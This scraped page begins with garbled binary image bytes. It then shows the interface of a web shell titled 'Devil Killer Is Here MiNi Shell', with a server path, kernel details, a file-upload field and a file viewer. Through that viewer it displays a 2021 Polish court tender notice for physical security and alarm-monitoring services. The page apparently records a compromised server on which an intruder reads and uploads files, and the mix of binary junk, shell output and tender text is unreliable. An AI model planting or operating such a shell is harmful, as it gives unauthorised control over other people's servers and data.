JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211018/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20211018/0023422901-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa bezpośredniej ochrony fizycznej osób i mienia, dozoru sygnałów przesyłanych, gromadzonych i przetwarzanych w systemach alarmowych dla Sądu Okręgowego i Sądu Rejonowego w Bielsku-Białej </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Sąd Okręgowy w Bielsku-Białej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000571553</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Cieszyńska 10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bielsko-Biała</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">43-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL225 - Bielski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetarg@bielsko-biala.so.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bielsko-biala.so.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ kontroli państwowej i ochrony prawa oraz sąd i trybunał</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Sąd </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa bezpośredniej ochrony fizycznej osób i mienia, dozoru sygnałów przesyłanych, gromadzonych i przetwarzanych w systemach alarmowych dla Sądu Okręgowego i Sądu Rejonowego w Bielsku-Białej </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a017f565-2fea-11ec-a3fb-0a24f8cd532c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00234229</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00016871/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 USŁUGA BEZPOŚREDNIEJ OCHRONY FIZYCZNEJ OSÓB I MIENIA DLA SĄDU OKRĘGOWEGO W BIELSKU-BIAŁEJ</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-a017f565-2fea-11ec-a3fb-0a24f8cd532c <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">www.bielsko-biala.so.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Oprogramowanie zewnętrzne (dostawcy podpisu kwalifikowanego): Mozilla Firefox ver.65 i późniejsze,Google Chrome ver.66 i późniejsze, Opera ver.58 i późniejsze, Microsoft Edge ver.18 i późniejsze,Internet Explorer 11,<br/>lista zalecanych przeglądarek internetowych: Google Chrome, Mozilla Firefox, Opera. System operacyjny Windows 7 i późniejsze.<br/>Oprogramowanie wbudowane w System SmartPZP: zainstalowane środowisko Java w wersji min. 1.8<br/>(jre), w przypadku przeglądarek Opera, Chrome i Firefox należy doinstalować dodatek do przeglądarki<br/>szafir SDK Web, oprogramowanie SzafirHost w systemie operacyjnym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust.1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych<br/>i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne<br/>rozporządzenie o ochronie danych)(Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”,<br/>Zamawiający informuje, że:<br/>􀀀 administratorem danych osobowych Wykonawców (w tym również Podwykonawców oraz podmiotów<br/>na zasoby, których powołuje się Wykonawca w celu spełnienia warunków udziału w postępowaniu) jest<br/>SĄD OKRĘGOWY W BIELSKU-BIAŁEJ, ul. Cieszyńska 10, 43-300 Bielsko-Biała, tel.(033) 499 04 99,<br/>fax: (33) 499 04 50, e-mail: przetarg@bielsko-biala.so.gov.pl;<br/>􀀀 inspektorem ochrony danych osobowych w Sądzie Okręgowym w Bielsku-Białej jest Pani Barbara<br/>Sośnicka-Pawińska, tel.: (33) 499 03 87, adres e-mail: iod@bielsko-biala.so.gov.pl;<br/>􀀀 dane osobowe Wykonawców (w tym również Podwykonawców oraz podmiotów na zasoby, których<br/>powołuje się Wykonawca w celu spełnienia warunków udziału w postępowaniu) przetwarzane będą na<br/>podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia<br/>publicznego pn.: „Usługa bezpośredniej ochrony fizycznej osób i mienia, dozoru sygnałów<br/>przesyłanych, gromadzonych i przetwarzanych w systemach alarmowych dla Sądu Okręgowego w<br/>Bielsku-Białej oraz Sądu Rejonowego w Bielsku-Białej”, który prowadzony jest w trybie podstawowym<br/>bez przeprowadzania negocjacji na podstawie art. 275 pkt 1 w zw. z. art. 359 pkt 2 ustawy PZP;<br/>􀀀 odbiorcami danych osobowych Wykonawców (w tym również Podwykonawców oraz podmiotów na<br/>zasoby, których powołuje się Wykonawca w celu spełnienia warunków udziału w postępowaniu) będą<br/>osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu<br/>o art. 18 oraz art. 74 ustawy PZP;<br/>Pełna treść ogłoszenia znajduje się na stronie internetowej Sądu: www.bielsko-biala.so.gov.pl w<br/>zakładce Obsługa danych osobowych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">G 226-002/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający żąda określonej etykiety lub wskazuje mające zastosowanie wymagania określonej etykiety, zgodnie z art. 104 ustaw - etykiety społecznej</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest świadczenie na rzecz Zamawiającego usługi bezpośredniej<br/>Ogłoszenie nr 2021/BZP 00191244/01 z dnia 2021-09-24<br/>2021-09-24 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>ochrony fizycznej osób i mienia, dozoru sygnałów przesyłanych, gromadzonych i<br/>przetwarzanych w systemach alarmowych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79700000-1 - Usługi detektywistyczne i ochroniarskie</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79710000-4 - Usługi ochroniarskie</p> <p class="mb-0">79711000-1 - Usługi nadzoru przy użyciu alarmu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-12-01 do 2022-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">17.1.	Zamawiający oceni i porówna jedynie te oferty, które:<br/>-	zostaną złożone przez Wykonawców, których Zamawiający nie wykluczy z postępowania;<br/>-	nie zostaną odrzucone przez Zamawiającego.<br/>17.2.	Zamawiający przy dokonywaniu wyboru najkorzystniejszej oferty stosować będzie następujące kryteria:<br/><br/>Cena za wykonanie przedmiotu zamówienia = 60,00 %<br/>Doświadczenie osób skierowanych do realizacji zamówienia = 25,00 %<br/>Czas dojazdu grupy interwencyjnej = 15,00 %<br/><br/>Kryterium cena (Wkc):<br/>Ilość punktów przyznana ocenianej ofercie ustalona zostanie w sposób następujący:<br/><br/>Wkc = (Cmin/C) x Wkcmax<br/><br/>gdzie:<br/>Wkc – liczba punktów oferty ocenianej;<br/>Cmin - cena najniższej oferty spośród ofert podlegających ocenie;<br/>C - cena ocenianej oferty;<br/>Wkcmax - (maksymalna liczba punktów w kryterium cena).<br/>Punkty zostaną obliczone w zaokrągleniu do drugiego miejsca po przecinku.<br/><br/>Kryterium doświadczenia osób skierowanych do realizacji zamówienia (Wkd):<br/>W ramach w/w kryterium Zamawiający będzie oceniał doświadczenie i praktykę zawodową osób skierowanych przez Wykonawcę do realizacji zamówienia. Ocena będzie dokonywana na podstawie oświadczenia Wykonawcy wskazanego w formularzu ofertowym. Wykonawca otrzyma:<br/>a.	za skierowanie do realizacji zamówienia wszystkich osób posiadających minimum 2 letnie doświadczenie w pracy na stanowisku pracownika ochrony – 10 pkt;<br/>b.	za skierowanie do realizacji zamówienia wszystkich osób posiadających minimum 3 letnie doświadczenie w pracy na stanowisku pracownika ochrony – 15 pkt;<br/>c.	za skierowanie do realizacji zamówienia wszystkich osób posiadających minimum 4 letnie doświadczenie w pracy na stanowisku pracownika ochrony – 20 pkt.<br/>d.	za skierowanie do realizacji zamówienia wszystkich osób posiadających minimum 5 letnie doświadczenie w pracy na stanowisku pracownika ochrony – 25 pkt.<br/>W przypadku nie wskazania 2, 3, 4, 5 letniego lub dłuższego doświadczenia wszystkich osób skierowanych do realizacji zamówienia Wykonawca otrzyma 0 pkt.<br/>Maksymalna ilość punktów do uzyskania w ramach kryterium doświadczenia wynosi 25 pkt.<br/><br/><br/>Kryterium czasu dojazdu (Wkcd):<br/><br/>Czas dojazdu grupy interwencyjnej w sytuacjach wymagających interwencji do budynków Sądu Okręgowego w Bielsku-Białej i Sądu Rejonowego w Bielsku-Białej musi być podany w minutach i nie może być krótszy niż 5 minut i dłuższy niż 15 minut, w którym to tylko zakresie minut będą wyliczane punkty badanej oferty - w kryterium tym można otrzymać maksymalnie 15 punktów. Jeżeli wykonawca poda czas dojazdu dłuższy niż 15 minut to jego oferta zostanie odrzucona .<br/><br/>W kryterium tym, Wykonawca otrzyma odpowiednio liczbę punktów na podstawie danych zawartych <br/>w Formularzu oferty w punkcie odnoszącym się do czasu dojazdu.<br/><br/><br/>Najkrótszy czas dojazdu zaoferowany w złożonych ofertach<br/>Czas dojazdu =	………………… x 15 pkt.<br/>Czas dojazdu zaoferowany w badanej ofercie<br/><br/><br/>Liczba punktów przyznanych w kryteriach zostanie ustalona według następującego wzoru:<br/><br/>W = Wkc + Wkd + Wkcd <br/><br/>gdzie:<br/>W – liczba punktów stanowiąca sumę punktów przyznanych kryteriach;<br/>Wkc – liczba punktów przyznana w ramach kryterium ceny;<br/>Wkd - liczba punktów przyznana w ramach kryterium doświadczenie osób skierowanych do realizacji zamówienia;<br/>Wkcd – liczba punktów przyznana w ramach kryterium czas dojazdu.<br/><br/>17.3.	Do oceny zostaną przyjęte ceny brutto oferty.<br/>17.4.	Za ofertę najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą łączną liczbę punktów w zastosowanych kryteriach oceny ofert. <br/>17.5.	Zamawiający dokona wyboru oferty Wykonawcy, którego oferta uzyska największą łączną liczbę punktów we wszystkich kryteriach (W).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób skierowanych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">25</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas dojazdu grupy interwencyjnej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 5.1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w niniejszej SWZ oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu dotyczące:<br/>5.1.1	Zdolności do występowania w obrocie gospodarczym<br/><br/>Zamawiający nie stawia w tym zakresie wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. <br/><br/>5.1.2.	Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów<br/><br/>Zgodnie z art. 15 ust. 1 ustawy o ochronie osób i mienia podjęcie działalności gospodarczej w zakresie usług ochrony osób i mienia wymaga uzyskania koncesji, określającej zakres i formy prowadzenia tych usług.<br/><br/>Opis sposobu dokonywania oceny spełniania tego warunku<br/><br/>Zamawiający uzna, że Wykonawca spełnia warunek dotyczący posiadania kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej poprzez złożenie wraz z ofertą oświadczenia na formularzu stanowiącym załącznik nr 3 do SWZ aktualnego na dzień składania ofert stanowiącego wstępne potwierdzenie, że Wykonawca spełnia niniejszy warunek udziału w postępowaniu.<br/><br/>Wykonawca nie może w celu wykazania spełnienia tego warunku udziału w postępowaniu skorzystać <br/>z zasobów innych podmiotów. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) przedmiotową koncesją winien wykazać się Wykonawca bezpośrednio realizujący usługi objęte przedmiotem zamówienia.<br/><br/>5.1.3	Sytuacji ekonomicznej lub finansowej <br/><br/>Opis sposobu dokonywania oceny spełniania tego warunku<br/><br/>Zamawiający nie definiuje warunku udziału w tym zakresie. Jednocześnie Zamawiający zwraca uwagę, iż po myśli §4 ust. 1 Rozporządzenia z dnia 9 grudnia 2013 r. Ministra Finansów w sprawie obowiązkowego ubezpieczenia odpowiedzialności cywilnej przedsiębiorcy wykonującego działalność gospodarczą w zakresie usług ochrony osób i mienia (Dz.U. z 2013 r. poz. 1550) przedsiębiorca wykonujący działalność gospodarczą w zakresie usług ochrony osób i mienia podlega obowiązkowemu ubezpieczeniu od odpowiedzialności cywilnej, a minimalna suma gwarancyjna ubezpieczenia OC <br/>w odniesieniu do jednego zdarzenia i do wszystkich zdarzeń, których skutki są objęte umową ubezpieczenia OC jest zależna od osiągniętego w roku obrotowym poprzedzającym rok zawarcia umowy ubezpieczenia OC rocznego obrotu netto przedsiębiorcy wykonującego działalność gospodarczą w zakresie usług ochrony osób i mienia, i wynosi równowartość w złotych:<br/>1)	20 000 euro - jeżeli roczny obrót netto z tytułu wykonywanej działalności gospodarczej nie przekroczył równowartości w złotych 2 000 000 euro;<br/>2)	25 000 euro - jeżeli roczny obrót netto z tytułu wykonywanej działalności gospodarczej przekroczył równowartość w złotych 2 000 000 euro i nie przekroczył równowartości w złotych 10 000 000 euro;<br/>3)	40 000 euro - jeżeli roczny obrót netto z tytułu wykonywanej działalności gospodarczej przekroczył równowartość w złotych 10 000 000 euro i nie przekroczył równowartości w złotych 50 000 000 euro;<br/>4)	50 000 euro - jeżeli roczny obrót netto z tytułu wykonywanej działalności gospodarczej przekroczył równowartość w złotych 50 000 000 euro. <br/><br/>5.1.4.	Zdolności technicznej lub zawodowej <br/><br/>Opis sposobu dokonywania oceny spełniania tego warunku:<br/>Zamawiający uzna, że Wykonawca spełnia warunek posiadania zdolności technicznej i zawodowej, jeżeli:<br/>a.	w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie – zrealizował należycie lub realizuje, co najmniej dwie umowy (zamówienia) zawarte na okres co najmniej 6 miesięcy każda i obejmujące realizację usługi ochrony osób i mienia w budynku użyteczności publicznej, o wartości brutto nie mniejszej niż 200.000 zł każda. Za spełnienie w/w warunku Zamawiający uzna złożenie przez Wykonawcę oświadczenia o spełnieniu warunków udziału w postępowaniu na formularzu stanowiącym załącznik nr 3 do SWZ. W tym miejscu Zamawiający wyjaśnia, iż po myśli §3 pkt 6 Rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakimi powinny odpowiadać budynki i ich usytuowanie (tj. Dz.U. z 2019 poz. 1065 z późn. zm.) budynek użyteczności publicznej to budynek przeznaczony na potrzeby administracji publicznej, wymiaru sprawiedliwości, kultury, kultu religijnego, oświaty, szkolnictwa wyższego, nauki, wychowania, opieki zdrowotnej, społecznej lub socjalnej, obsługi bankowej, handlu, gastronomii, usług, w tym usług pocztowych lub telekomunikacyjnych, turystyki, sportu, obsługi pasażerów w transporcie kolejowym, drogowym, lotniczym, morskim lub wodnym śródlądowym, oraz inny budynek przeznaczony do wykonywania podobnych funkcji; za budynek użyteczności publicznej uznaje się także budynek biurowy lub socjalny. <br/>b.	wykonawca będzie dysponował osobami o odpowiednich kwalifikacjach zawodowych, <br/>o których mowa jest w art. 26 ustawy o ochronie osób i mienia. Za spełnienie w/w warunku Zamawiający uzna złożenie przez Wykonawcę oświadczenia o spełnieniu warunków udziału w postępowaniu na formularzu stanowiącym załącznik nr 3 do SWZ.<br/>5.2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunki z pkt 5.1.1-5.1.4 powinien spełnić co najmniej jeden z Wykonawców albo wszyscy Wykonawcy wspólnie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Warunkiem udziału w postępowaniu jest wniesienie wadium w wysokości 5.000 zł (słownie pięć tysięcy złotych 00/100), w terminie składania ofert (dzień i godzina).<br/>12.2.	Wadium może być wnoszone w jednej lub kilku formach wyszczególnionych w art. 97 ust. 7 ustawy PZP:<br/>-	w pieniądzu;<br/>-	w gwarancjach bankowych;<br/>-	gwarancjach ubezpieczeniowych;<br/>-	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tj. Dz.U. z 2020 r. poz. 299 z późn. zm.).<br/>12.3	.Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego, który prowadzony jest w Banku Gospodarstwa Krajowego o/ Katowice nr:<br/>91 1130 1017 0021 1000 4090 